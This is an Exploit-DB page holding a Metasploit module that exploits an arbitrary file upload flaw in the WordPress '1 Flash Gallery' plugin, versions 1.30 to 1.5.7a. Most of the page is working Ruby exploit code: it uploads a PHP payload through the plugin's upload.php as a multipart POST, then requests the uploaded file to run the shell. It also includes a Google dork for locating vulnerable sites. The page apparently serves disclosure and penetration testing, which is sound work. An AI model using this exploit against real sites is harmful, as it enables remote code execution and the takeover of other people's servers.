WordPress Plugin 1 Flash Gallery 1.30 < 1.5.7a - Arbitrary File Upload (Metasploit)

EDB-ID:

17801

CVE:


EDB Verified:

Author:

Ben Schmidt

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2011-09-08

Vulnerable App: 
# Exploit Title: 1 Flash Gallery Wordpress Plugin Arbitrary File Upload Exploit
# # Google Dork:  inurl:"wp-content/plugins/1-flash-gallery"
# # Date: 09/06/2011
# # Author: Ben Schmidt
# # Software Link: http://downloads.wordpress.org/plugin/1-flash-gallery.1.5.6.zip
# # Version: v1.30 to v1.5.7a (tested on 1.5.6 and 1.5.7 prior to patch)

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '1 Flash Gallery Wordpress Plugin File Upload Exploit',
			'Description'    => %q{
            This module exploits an arbitrary file upload vulnerability in
            the '1 Flash Gallery' Wordpress plugin.
			},
			'Author'         => [ 'Ben Schmidt'],
			'License'        => MSF_LICENSE,
			'References'     => ["http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					# Arbitrary big number. The payload gets sent as an HTTP
					# POST request, so it's possible this might be smaller (maybe?)
                    # but very unlikely.
					'Space'       => 262144, # 256k
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0,
            'DisclosureDate' => 'Sept 6, 2011'
            ))

		register_options([
				OptString.new('URI', [true, "Path to Wordpress", "/"]),
			], self.class)
	end

    def exploit
		boundary = rand_text_alphanumeric(6)
        fn = rand_text_alphanumeric(8)
		data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
		data << "filename=\"#{fn}.php\"\r\nContent-Type: application/x-httpd-php\r\n\r\n"
		data << payload.encoded
		data << "\r\n--#{boundary}--"

		res = send_request_raw({
			'uri'	  => datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
			'method'  => 'POST',
			'data'    => data,
			'headers' =>
			{
				'Content-Type'	 => 'multipart/form-data; boundary=' + boundary,
				'Content-Length' => data.length,
			}
		}, 25)

        if (res)
			print_status("Successfully uploaded shell.")
            shell_path = res.body.split("_")[0]
            print_status("Trying to access shell at #{shell_path}...")
            res = send_request_raw({
                'uri'	  => datastore['URI'] + shell_path,
                'method'  => 'GET',
            }, 0.01)

		else
			print_error("Error uploading shell")
		end

        handler
    end
end
Tags: WordPress Plugin
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services